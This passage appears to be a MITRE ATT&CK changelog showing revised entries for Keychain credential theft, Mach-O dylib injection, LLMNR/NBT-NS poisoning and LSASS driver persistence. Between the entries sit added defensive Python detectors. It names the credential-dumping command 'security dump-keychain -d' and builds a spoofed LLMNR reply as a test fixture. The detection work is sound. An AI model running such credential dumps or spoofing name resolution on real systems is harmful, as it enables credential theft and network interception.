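     "path": "/Users/alice/Library/Keychains/login.keychain-db"},                # expected reader
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Both `dump-keychain -d` and the direct file read still require the login password to yield plaintext, so pair these alerts with authentication prompts or `securityd` unlock events rather than treating a read of `login.keychain-db` alone as a confirmed compromise.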
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-17 13:14:31.140000+00:00 | 2022-04-18 20:32:22.122000+00:00 |
| description | Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials. | Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.(Citation: Keychain Services Apple)(Citation: Keychain Decryption Passware)(Citation: OSX Keychain Schaumann) Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain -d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.(Citation: External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) |
| external_references[1]['source_name'] | Wikipedia keychain | External to DA, the OS X Way |
| external_references[1]['description'] | Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017. | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Keychain_(software) | http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way |
| external_references[2]['source_name'] | External to DA, the OS X Way | Keychain Services Apple |
| external_references[2]['description'] | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017. | Apple. (n.d.). Keychain Services. Retrieved April 11, 2022. |
| external_references[2]['url'] | http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way | https://developer.apple.com/documentation/security/keychain_services |
| x_mitre_data_sources[3] | File: File Access | Process: Process Creation |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Empire Keychain Decrypt', 'description': 'Empire. (2018, March 8). Empire keychaindump_decrypt Module. Retrieved April 14, 2022.', 'url': 'https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py'} | |
| external_references | {'source_name': 'OSX Keychain Schaumann', 'description': 'Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.', 'url': 'https://www.netmeister.org/blog/keychain-passwords.html'} | |
| external_references | {'source_name': 'Keychain Decryption Passware', 'description': 'Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption. Retrieved April 13, 2022.', 'url': 'https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption'} | |
| x_mitre_data_sources | File: File Access |
| Old Description | New Description |
|---|---|
| Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) | Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X) |
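The description above boils down to two observable changes in the Mach-O load-command table: an LC_LOAD_DYLIB entry the original build never had, and a missing LC_CODE_SIGNATURE command where one used to be. The following is an added example, not code from ATT&CK or from the cited Wardle papers: it walks a 64-bit Mach-O header with bounds checks, lists the dylibs the loader will pull in, and reports both conditions. The two sample "binaries" are constructed header-plus-load-command blobs, not real executables, and the trusted-prefix list is an assumption to adjust per environment.

```python
"""Inspect a Mach-O 64-bit load-command table for injected LC_LOAD_DYLIB entries
and a stripped LC_CODE_SIGNATURE.

Added example. SIGNED_BINARY / TAMPERED_BINARY are constructed blobs, not real
executables; TRUSTED_PREFIXES is an assumed baseline.
"""
import struct

MH_MAGIC_64 = 0xFEEDFACF
LC_LOAD_DYLIB = 0x0C
LC_CODE_SIGNATURE = 0x1D

# mach_header_64: magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved
MACH_HEADER_64 = struct.Struct("<IiiIIIII")
LOAD_COMMAND = struct.Struct("<II")              # cmd, cmdsize
# dylib_command: cmd, cmdsize, name offset, timestamp, current_version, compatibility_version
DYLIB_COMMAND = struct.Struct("<IIIIII")
LINKEDIT_DATA_COMMAND = struct.Struct("<IIII")   # cmd, cmdsize, dataoff, datasize

# Assumed-benign dylib prefixes. @rpath/@executable_path entries are normal in app
# bundles but cannot be judged without the bundle, so they are not flagged here.
TRUSTED_PREFIXES = ("/usr/lib/", "/System/Library/", "@")


def load_commands(blob):
    """Yield (cmd, raw_bytes) for each load command, refusing to read past sizeofcmds."""
    hdr = MACH_HEADER_64.unpack_from(blob, 0)
    magic, ncmds, sizeofcmds = hdr[0], hdr[4], hdr[5]
    if magic != MH_MAGIC_64:
        raise ValueError("not a little-endian 64-bit Mach-O")
    off, end = MACH_HEADER_64.size, MACH_HEADER_64.size + sizeofcmds
    if end > len(blob):
        raise ValueError("sizeofcmds exceeds file")
    for _ in range(ncmds):
        if off + LOAD_COMMAND.size > end:
            raise ValueError("load command table truncated")
        cmd, cmdsize = LOAD_COMMAND.unpack_from(blob, off)
        if cmdsize < LOAD_COMMAND.size or off + cmdsize > end:
            raise ValueError(f"bad cmdsize {cmdsize} at offset {off}")
        yield cmd, blob[off:off + cmdsize]
        off += cmdsize


def dylib_path(raw):
    """Extract the NUL-terminated path referenced by a dylib_command."""
    name_off = DYLIB_COMMAND.unpack_from(raw, 0)[2]
    if name_off >= len(raw):
        raise ValueError("dylib name offset outside command")
    return raw[name_off:].split(b"\x00", 1)[0].decode("utf-8", "replace")


def audit(blob):
    """Return the dylib list, whether LC_CODE_SIGNATURE is present, and findings."""
    dylibs, signed = [], False
    for cmd, raw in load_commands(blob):
        if cmd == LC_LOAD_DYLIB:
            dylibs.append(dylib_path(raw))
        elif cmd == LC_CODE_SIGNATURE:
            signed = True
    findings = []
    if not signed:
        findings.append("no LC_CODE_SIGNATURE load command (signature stripped or never signed)")
    for path in dylibs:
        if not path.startswith(TRUSTED_PREFIXES):
            findings.append(f"LC_LOAD_DYLIB outside trusted prefixes: {path}")
    return {"dylibs": dylibs, "code_signature": signed, "findings": findings}


# --- constructed samples ---------------------------------------------------
def _dylib_cmd(path):
    name = path.encode() + b"\x00"
    size = DYLIB_COMMAND.size + len(name)
    size += -size % 8                             # load commands are 8-byte aligned
    return (DYLIB_COMMAND.pack(LC_LOAD_DYLIB, size, DYLIB_COMMAND.size, 2, 0x10000, 0x10000)
            + name.ljust(size - DYLIB_COMMAND.size, b"\x00"))


def _macho(cmds):
    body = b"".join(cmds)
    # CPU_TYPE_ARM64 (0x0100000C), MH_EXECUTE (2); remaining fields zero
    return MACH_HEADER_64.pack(MH_MAGIC_64, 0x0100000C, 0, 2, len(cmds), len(body), 0, 0) + body


CODESIG_CMD = LINKEDIT_DATA_COMMAND.pack(LC_CODE_SIGNATURE, LINKEDIT_DATA_COMMAND.size, 0x4000, 0x200)
SIGNED_BINARY = _macho([_dylib_cmd("/usr/lib/libSystem.B.dylib"), CODESIG_CMD])
# Same table after the tampering described above: a dylib appended, LC_CODE_SIGNATURE removed.
TAMPERED_BINARY = _macho([_dylib_cmd("/usr/lib/libSystem.B.dylib"), _dylib_cmd("/tmp/.cache/evil.dylib")])

if __name__ == "__main__":
    for label, blob in (("signed", SIGNED_BINARY), ("tampered", TAMPERED_BINARY)):
        print(label, audit(blob))
```

Run it against real files with `audit(open(path, "rb").read())`; fat (universal) binaries need their per-architecture slice located first, which this parser does not do. A missing LC_CODE_SIGNATURE is a strong signal on a binary that ships signed, so the useful baseline is the vendor's original dylib list and signature presence, compared against what is on disk.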
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-30 00:51:58.454000+00:00 | 2022-04-20 17:08:21.101000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X) | Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes. Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X) |
| external_references[1]['source_name'] | Writing Bad Malware for OSX | Malware Persistence on OS X |
| external_references[1]['description'] | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. | Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017. |
| external_references[1]['url'] | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf |
| external_references[2]['source_name'] | Malware Persistence on OS X | Writing Bad Malware for OSX |
| external_references[2]['description'] | Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. Retrieved July 10, 2017. | Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved July 10, 2017. |
| external_references[2]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Modification |
| x_mitre_data_sources[2] | File: File Metadata | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Modification | Module: Module Load |
| x_mitre_data_sources[4] | Module: Module Load | File: File Metadata |
| Old Description | New Description |
|---|---|
| By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder) | By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder) |
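A poisoner has to answer LLMNR queries it did not legitimately own, which is exactly what makes it detectable: query the 224.0.0.252:5355 group for a name no host should have, and anyone who answers is spoofing. That is the approach of the Conveigh reference added to this technique. The following is an added example, not code from ATT&CK, Conveigh or Responder: it builds the DNS-format LLMNR query, parses a reply (including compression pointers), and decides whether the reply belongs to our canary. The poisoned reply is constructed inline to mimic what a spoofing responder sends; `probe_live` is the only function that touches the network and is assumed to run on a host with LLMNR reachable.

```python
"""Canary-based LLMNR poisoner detection (added example, not from the page or
any cited tool). The reply packet is constructed; probe_live needs a network.
"""
import secrets
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355   # RFC 4795 multicast group and UDP port
HEADER = struct.Struct("!HHHHHH")                 # id, flags, qdcount, ancount, nscount, arcount
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """DNS label encoding: length-prefixed labels, NUL terminated."""
    out = bytearray()
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return bytes(out) + b"\x00"


def decode_name(pkt, off):
    """Decode a name at pkt[off], following 0xC0xx compression pointers; return (name, next_off)."""
    labels, end, hops = [], None, 0
    while True:
        length = pkt[off]
        if length & 0xC0 == 0xC0:                 # pointer: 14-bit offset into the packet
            if end is None:
                end = off + 2
            off = struct.unpack_from("!H", pkt, off)[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        if length == 0:
            off += 1
            break
        labels.append(pkt[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    return ".".join(labels), (end if end is not None else off)


def build_query(name, txid):
    """LLMNR query: DNS header with QR=0 and one A/IN question."""
    return HEADER.pack(txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def parse_response(pkt):
    txid, flags, qd, an, _, _ = HEADER.unpack_from(pkt, 0)
    off, questions, answers = HEADER.size, [], []
    for _ in range(qd):
        qname, off = decode_name(pkt, off)
        off += 4                                  # skip qtype + qclass
        questions.append(qname)
    for _ in range(an):
        rname, off = decode_name(pkt, off)
        rtype, _, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)
        answers.append((rname, rtype, rdata))
    return {"id": txid, "qr": bool(flags & 0x8000), "questions": questions, "answers": answers}


def poisoner_address(reply, canary, txid):
    """IP a responder claims for our canary name, or None if the packet is unrelated."""
    r = parse_response(reply)
    if not r["qr"] or r["id"] != txid:
        return None
    for rname, rtype, rdata in r["answers"]:
        if rtype == QTYPE_A and rname.lower() == canary.lower():
            return rdata
    return None


def probe_live(timeout=2.0):
    """Send one random canary query to the LLMNR group; return source IPs that answered."""
    name, txid = "fs-" + secrets.token_hex(4), secrets.randbits(16)
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src, _) = s.recvfrom(4096)
                if poisoner_address(data, name, txid):
                    hits.append(src)
        except socket.timeout:
            pass
    return hits


def fake_poisoned_reply(query, attacker_ip):
    """Constructed reply mimicking a spoofing responder: echoes the id, QR=1, one A record."""
    txid = HEADER.unpack_from(query, 0)[0]
    _qname, off = decode_name(query, HEADER.size)
    question = query[HEADER.size:off + 4]
    answer = struct.pack("!H", 0xC00C)            # name = pointer to the question name
    answer += struct.pack("!HHIH", QTYPE_A, QCLASS_IN, 30, 4) + socket.inet_aton(attacker_ip)
    return HEADER.pack(txid, 0x8000, 1, 1, 0, 0) + question + answer
```

A positive hit gives the responder's IP, which is the host to go and look at; a canary name that nobody should resolve keeps false positives near zero, unlike passively alerting on every LLMNR reply. The same probing idea applies to NBT-NS on UDP 137 with its own packet format, which this block does not cover.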
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 3.0.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-28 13:09:50.809000+00:00 | 2022-10-25 15:46:55.393000+00:00 |
| description | By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder) | By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS) Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response. Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder) |
| external_references[1]['source_name'] | Wikipedia LLMNR | Rapid7 LLMNR Spoofer |
| external_references[1]['description'] | Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017. | Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution | https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response |
| external_references[2]['source_name'] | TechNet NetBIOS | GitHub Responder |
| external_references[2]['description'] | Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017. | Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017. |
| external_references[2]['url'] | https://technet.microsoft.com/library/cc958811.aspx | https://github.com/SpiderLabs/Responder |
| external_references[3]['source_name'] | byt3bl33d3r NTLM Relaying | Secure Ideas SMB Relay |
| external_references[3]['description'] | Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019. | Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019. |
| external_references[3]['url'] | https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html | https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html |
| external_references[4]['source_name'] | Secure Ideas SMB Relay | TechNet NetBIOS |
| external_references[4]['description'] | Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019. | Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017. |
| external_references[4]['url'] | https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html | https://technet.microsoft.com/library/cc958811.aspx |
| external_references[6]['source_name'] | Rapid7 LLMNR Spoofer | GitHub Conveigh |
| external_references[6]['description'] | Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017. | Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017. |
| external_references[6]['url'] | https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response | https://github.com/Kevin-Robertson/Conveigh |
| external_references[7]['source_name'] | GitHub Responder | byt3bl33d3r NTLM Relaying |
| external_references[7]['description'] | Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017. | Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019. |
| external_references[7]['url'] | https://github.com/SpiderLabs/Responder | https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html |
| external_references[9]['source_name'] | GitHub Conveigh | Wikipedia LLMNR |
| external_references[9]['description'] | Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017. | Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017. |
| external_references[9]['url'] | https://github.com/Kevin-Robertson/Conveigh | https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Andrew Allen, @whitehat_zero | |
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |
| Old Description | New Description |
|---|---|
| Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. | Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-25 16:52:26.567000+00:00 | 2022-04-20 16:34:43.405000+00:00 |
| description | Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads. | Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The 